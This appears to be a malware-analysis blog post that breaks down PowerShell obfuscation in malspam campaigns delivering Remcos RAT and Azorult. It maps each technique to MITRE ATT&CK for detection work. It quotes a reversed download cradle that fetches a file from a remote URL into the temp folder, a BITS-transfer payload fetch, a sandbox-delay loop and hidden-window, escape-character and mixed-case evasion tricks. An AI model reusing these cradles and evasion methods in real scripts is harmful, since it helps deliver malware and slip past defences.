Deconstructing PowerShell Obfuscation in-the-wild
This post attempts to explore various PowerShell obfuscation techniques, commonly found in malspam campaigns.
These scripts are usually launched by VBA macros, embedded in Office documents, and act as download cradles to download and execute remote secondary stage payloads. These methods can prove quite effective against static signature-based detections.
Since the primary focus of this post is the obfuscation techniques, the script functionality is mentioned very briefly.
Case 1 — Remcos RAT infection from Malicious Excel Macros
The below script was part of a recent malspam campaign, delivering Remcos remote access trojan (RAT) via financially-themed emails. Sample artifacts can be found here.
Opening the malicious Excel attachment triggers VBA macro execution, that in-turn launches the below obfuscated PowerShell download cradle:
(T1059.001: Command and Scripting Interpreter: PowerShell,
T1566.001: Phishing: Spearphishing Attachment &
T1059.005: Command and Scripting Interpreter: Visual Basic)
The cradle primarily employs the below two string obfuscation methods (T1027: Obfuscated Files or Information):
Using Variables & String Concatenation
Here the script strings are split into multiple parts which are then concatenated through the “+” or -join operator.
In the script we see three random alphanumeric variables, $we22, $b4df and $c3 which hold string values. These are then combined to form the forth variable $TC, using the -join operator.
($TC=$c3,$b4df,$we22 -Join '')The value of TC after the Join is:
)’sbv.csim\’+pmet:vne$,’UxKUVsB6crz3IBA=yekhtua&.evirdeno//:ptth’(eliFdaolnwoD.)tneilCbeW.teN tcejbO-weN(String Reversing
The next step is to reverse the above $TC variable. For this, the attacker makes use of reverse regular expression matching, using RightToLeft Regex option.
The [regex] type accelerator with the Matches() static method is used to make this work. ForEach looping and -join is used to then combine each of the matched values.
[regex]::Matches($TC,'.','RightToLeft') | ForEach {$_.value}) -join ''Command Alias
Here we see the usage of IEX cmdlet to run the specified string. This is an alias for Invoke-Expression cmdlet.
The deobfuscated PS command that is run will look something like this:
The above is a classic example of employing Powershell to download and run a payload, using the “DownloadFile Start-Process” method.
Case 2 — Azorult distributed through malspam
The below script was part of a malspam campaign, delivering Azorult Infostealer. Sample artifacts can be found here.
Encoding (Base64)
The script is first obfuscated in two layers of base64 encoding, before the obfuscated clear text strings can be seen, as shown above (T1140: Deobfuscate/Decode Files or Information).
Although not an obfuscation technique, it’s interesting to note the for loop at the start of the script. It just prints the numbers from 1–13000. This is most likely implemented to delay secondary stage payload download, to hopefully exceed time thresholds of automated analysis environments (T1497.003: Virtualization/Sandbox Evasion: Time Based Evasion).
for ($i=1; $i -le 13000; $i++) {$i,"`n"}Fucntions
A function that takes two parameters, called kqmeh is defined here (line 7). The function contains Start-BitsTransfercmdlet, which is used to create a BITS transfer job to download the payload. The cmdlet Invoke-Item is then used to run the payload (T1197: BITS Jobs).
StART-BiTsTRanSfEr -sourCe $yphjc -DesTinAtIoN $qhlTry-Catch Block
A try-catch block is implemented to invoke the above mentioned function and pass the relevant parameters. The values passed are the Source (location of the secondary payload) and Destination (where the payload will be saved locally) parameters for the function defined above.
The deobfuscated PS command would look something like this:
This is an alternate method to the “DownloadFile Start-Process” discussed in the first case.
Case 3 — Remcos RAT infection from Malicious Excel Macros
The below script was also part of a malspam campaign also delivering Remcos RAT. Sample artifacts can be found here.
Argument Replacement
We see the usage of the argument -w 1 , instead of -w hidden.Here 1 is the numerical representation of hidden, and is commonly used to conceal any powershell windows from the plain sight of users (T1564.003: Hide Artifacts: Hidden Window).
Escape Character
Here we see an attempt to obfuscate a powershell cmdlet(nEw-oB`jecT )using backtick (`) character. Backtick is the escape character in PowerShell.
In powershell, there are 14 escape sequences, and they begin with the backtick character. For example new line is represented as `n .However, in out case `jis not a recognized escape character, and so nEw-oB`jecT will be interpreted as nEw-oBjecT itself.
Mixed Case Letters
This is pretty straight forward. Since PowerShell cmdlets are not case sensitive, the attacker attempts to mix upper/lower case letters to hopefully evade static signature-matchings that are case sensitive.
The deobfuscated PS command that is run will look something like this:
The functionality of this download cradle is very similar to the one discussed in “Case 1”.
MITRE ATT&CK TTPs Encountered
Initial Access
T1566.001: Phishing: Spearphishing Attachment
Execution
T1059.001: Command and Scripting Interpreter: PowerShell
T1059.005: Command and Scripting Interpreter: Visual Basic
T1204.002: User Execution: Malicious File
Defense Evasion
T1564.003: Hide Artifacts: Hidden Window
T1497.003: Virtualization/Sandbox Evasion: Time Based Evasion
T1197: BITS Jobs
T1140: Deobfuscate/Decode Files or Information
References
Revoke-Obfuscation: PowerShell Obfuscation Detection Using Science.pdf, Daniel Bohannon
The Increased Use of PowerShell in Attacks.pdf by Symantec
